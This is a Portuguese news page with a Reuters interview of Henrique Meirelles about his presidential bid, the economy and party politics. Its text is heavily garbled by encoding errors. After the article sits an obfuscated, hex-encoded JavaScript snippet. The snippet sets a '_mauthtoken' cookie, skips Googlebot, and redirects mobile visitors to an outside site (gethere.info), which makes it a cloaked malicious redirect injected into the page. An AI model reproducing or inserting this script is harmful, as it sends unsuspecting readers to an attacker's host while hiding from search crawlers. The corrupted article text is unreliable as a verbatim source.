Home » Brasil » Governo » Meirelles aposta na economia para resolver todos problemas do paA�s

Meirelles aposta na economia para resolver todos problemas do paA�s

Ex-ministro da Fazenda se vA? como um candidato que pode conversar com todos os lados, da direita A� esquerda

BrasA�lia a�� Ex-ministro da Fazenda em busca de uma candidatura A� PresidA?ncia,A�Henrique MeirellesA�aposta na economia como soluA�A?o para todos os problemas do Brasil, inclusive a radicalizaA�A?o que divide o paA�s, e se vA? como um candidato que pode conversar com todos os lados, da direita A� esquerda, preocupada com questA�es sociais.

Como em quase tudo, o ex-ministro vA? a divisA?o polA�tica por que passa o paA�s pelo viA�s econA?mico.

a�?Eu acho que A� uma consequA?ncia normal da polarizaA�A?o polA�tica, mas principalmente da situaA�A?o econA?mica. Existe um ditado antigo que diz que onde falta pA?o todos brigam e todos tA?m razA?o. E no fundo A� essa questA?oa�?, disse A� Reuters em entrevista no feriado do Dia do Trabalho.

Meirelles credita a crise econA?mica ao fato de o governo de Dilma Rousseff ter aplicado a�?a essA?ncia da doutrina econA?micaa�? do PT, o que levou A� responsabilizaA�A?o do partido pela recessA?o e a uma reaA�A?o polA�tica.

a�?No momento que o PT aplicou de fato a sua polA�tica ideolA?gica, histA?rica, o paA�s entrou em uma recessA?o enorme. Isso evidentemente gerou uma polarizaA�A?o muito grande, com problema de violA?ncia, produto muito da situaA�A?o econA?mica. NA?s estamos vivendo essa radicalizaA�A?oa�?, argumentou.

Resolver isso, afirma, passa por resolver a questA?o econA?mica e pela capacidade de conversar com todos os lados a��uma habilidade que ele diz ter.

a�?EntA?o eu acho que o que A� preciso A� uma proposta, uma candidatura que em primeiro lugar consiga conversar com os diversos setores da sociedade, o que eu acredito que tenho condiA�A�es de fazer. Desde o eleitor radical de esquerda, A� direita. Seja para discutir seguranA�a de um lado, seja para discutir polA�tica social, de outro, porque eu me sinto A� vontade para isso, inclusive porque eu nunca fiz parte de grupo polA�ticoa�?, afirmou.

Apesar das crA�ticas ao governo de Dilma, Meirelles faz questA?o de lembrar que fez parte do governo de Luiz InA?cio Lula da Silva, a versA?o bem-sucedida dos anos petistas no governo, e puxa para si, por diversas vezes, a responsabilidade pela estabilidade econA?mica.

Afirma que o PT estA? pagando o preA�o de ter levado o paA�s A� recessA?o, mas lembra que o governo Lula estabilizou a economia enquanto ele, Meirelles, estava no Banco Central.

a�?NA?o se questiona que durante o perA�odo de 2003 a 2011 a inflaA�A?o foi controlada, que a economia foi estabilizada, que o Brasil aumentou sua forA�a de resistA?ncia a crises internacionais e eu era o presidente do Banco Central. EntA?o eu me sinto em uma posiA�A?o muito confortA?vela�?, disse Meirelles, em uma sala de reuniA�es na sede do MDB, em BrasA�lia.

Temer e PSDB

Goiano de AnA?polis, o ex-ministro ainda nA?o A� candidato. Precisa esperar pela decisA?o do presidente Michel Temer que, apesar da baixa popularidade e 2 por cento de intenA�A�es de voto no melhor cenA?rio da A?ltima pesquisa Datafolha, ainda avalia a possibilidade de tentar se manter no cargo. Enquanto Temer nA?o se decide a��o que deve ocorrer atA� julhoa��, Meirelles viaja, conversa e tenta se tornar mais conhecido.

Uma vaga de candidato a vice-presidente, diz, nA?o estA? em seus planos, seja no MDB, seja com o tucano Geraldo Alckmin na cabeA�a de chapa.

a�?Eu nA?o estou trabalhando com a hipA?tese de ser vice. Acho que se chegar a uma situaA�A?o que se chegue a isso, vamos analisar. Eu nA?o trabalho com essa hipA?tese. JA? fui convidado para ser candidato a vice no passado, 2010, 2014, nA?o aceitei.a�?

Nos A?ltimos dias, surgiram informaA�A�es de que o MDB estaria negociando um possA�vel acordo para que Meirelles pudesse ser vice numa chapa encabeA�ada por Alckmin. Meirelles nega.

a�?O PSDB tem manifestado uma posiA�A?o de nA?o defender o legado do governo. LegA�timo, direito deles. SA? que o MDB evidentemente vai fazer alianA�as com partidos que defendam o que o governo estA? fazendo, porque se nA?o vai ser difA�cil. EntA?o com isso nA?o hA? conversas de Vice-PresidA?ncia com o governadora�?, garantiu.

Se herdar a vaga de candidato a presidente pelo partido do governo, Meirelles terA? que carregar em seu palanque um presidente e vA?rios ministros atacados por diversas denA?ncias de corrupA�A?o, com uma aprovaA�A?o pA�fia e que, mesmo tendo avanA�ado nas questA�es econA?micas, nA?o conseguiu convencer a maior parte da populaA�A?o de que hA? de fato melhorias.

O ex-ministro minimiza o peso do governo em seu palanque. Diz que Temer estA? se defendendo e a corrupA�A?o A� um problema que ataca a todos os partidos, nA?o apenas ao MDB.

a�?Eu nA?o vejo nada que possa justificar um voto, por exemplo, na oposiA�A?o. Digamos, vocA? teve o A?ltimo governo que levou o Brasil A� maior recessA?o da histA?ria do paA�s. VocA? tambA�m tem os outros partidos com muitos problemas e muito menos realizaA�A�es, entA?o acho que A� uma plataforma extremamente viA?vel e eu estou preparado para mostrar isso com muita clareza, especialmente considerando-se que o MDB tem tempo de televisA?o e tem base no paA�s inteiroa�?, afirmou.

a�?Meu histA?rico A� extremamente positivo em todos os aspectos, especialmente em integridade pessoal. NA?o vejo grande problema nessa A?rea nA?o. Principalmente porque, se fosse uma questA?o do MDBa�� mas estA? havendo acusaA�A�es contra o PT a��aliA?s, o lA�der mA?ximo estA? presoa�� contra o PSDB, e outros partidos grandes. A� uma questA?o de toda classe polA�ticaa�?, defendeu.

Na A?ltima pesquisa Datafolha, Meirelles tem apenas 1 por cento de intenA�A�es de voto. A rejeiA�A?o do ex-ministro, no entanto, A� de apenas 17 por cento, enquanto a de Temer chega a 64 por cento.

Mesmo dentro do MDB, segundo contou A� Reuters o prA?prio Meirelles, a preferA?ncia em uma pesquisa interna a��feita com deputados, senadores, governadores, prefeitos e vereadoresa�� foi de que ele fosse o candidato do partido, A� frente de Temer.

a�?Liberal no sentido clA?ssicoa�?

Aos 72 anos, o ex-ministro credita seus baixos nA?meros eleitorais ao desconhecimento. Lembra que em uma outra pesquisa feita pelo partido, apenas 27 por cento dos entrevistados tinham alguma ideia do que fazia e quem era o ministro da Fazenda. Mas, afirma, quando se contava um pouco da sua trajetA?ria a��onde se coloca, de uma forma resumida e parcial, que ele foi o responsA?vel pela economia no governo Lula e que quando saiu do Banco Central a crise comeA�oua�� as reaA�A�es eram positivas.

De novo, Meirelles se volta A� economia para justificar porque pode vir a ser um candidato viA?vel.

a�?A economia A� fundamental, A� chave. O emprego, a renda, a inflaA�A?o, A� fundamental.a�?

Em um ambiente eleitoral dividido e polarizado como promete ser o pleito de outubro, Meirelles se vA? como um candidato capaz de conversar com todos os lados. Sua autodefiniA�A?o polA�tica, diz, A� a�?liberala�?.

a�?Liberal no sentido clA?ssico, no sentido inglA?s, de quem defende a liberdade na economia, na polA�tica, na democracia.a�?

a�?Essa posiA�A?o conservadora no Brasil estA? muito confusa, o que quer dizer isso? Quer dizer violA?ncia, quer dizer radicalismo? NA?o. EntA?o eu prefiro a visA?o clA?ssica do liberal. Liberdade econA?mica para crescer, para empreender, liberdade de opiniA?o, de voto, no sentido de independA?ncia dos Poderes e livre mercado, nA?o hA? dA?vidaa�?, afirma.

Meirelles defende que nA?o hA? contradiA�A?o entre o liberalismo e defesa de direitos humanos, direitos das minorias, da liberdade de expressA?o.

a�?Temos que separar muito bem as coisas. Eu nA?o considero que uma posiA�A?o conservadora negue os direitos humanos, ao contrA?rio. A posiA�A?o liberal clA?ssica favorece os direitos humanos, a democracia, eu acho que isso nA?o deve ser confundido com algumas posiA�A�es radicais A� direita. Isso nA?o A� a posiA�A?o classicamente chamada de conservadora em qualquer lugar do mundo. Existe sim uma defesa de direitos humanos, de liberdade de expressA?o, de direitos de minorias. Eu defendo com toda tranquilidadea�?, diz.

Ao mesmo tempo, o ministro a��que em sua peregrinaA�A?o eleitoral tem se aproximado de setores vistos como mais conservadores em relaA�A?o a temas sociais, como as igrejas evangA�licasa�� diz que tambA�m valores de a�?famA�lia, de integridade, de trabalho duroa�?.

a�?Eu tenho interagido muito com pA?blicos e lideranA�as evangA�licas com maior tranquilidade. Sinto uma grande identidade de valores, que sA?o o trabalho, A�tica, meritocracia, etc.a�?

A tentativa de se colocar como alguA�m capaz de conversar com todos os lados tem uma razA?o prA?tica: Meirelles acredita que o candidato do centro que chegar ao segundo turno ganharA? a eleiA�A?o porque disputarA? com alguA�m mais extremista, seja o deputado Jair Bolsonaro (PSL-RJ), A� direita, ou uma alianA�a de esquerda do outro lado.

a�?Essa A� uma eleiA�A?o que eu acho que A� do centro, A� uma eleiA�A?o para chegar ao segundo turno. Porque o candidato do centro que chegar ao segundo turno ganha a eleiA�A?o. Porque os dois extremos tA?m limitaA�A�es muito claras. O candidato de centro que entrar no segundo turno tem o centro todoa�?, diz.

a�?Vamos supor que seja com Bolsonaro. Eu nA?o tenho muita dA?vida que boa parte dos que hoje declaram voto no presidente Lula nA?o teriam problema nenhum em votar em mim, atA� porque eu participei do governo dele com grande sucesso.a�?

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Publicação: Redação Brasil (m)
Tags

Publicações Similares

Login

Perdeu sua senha?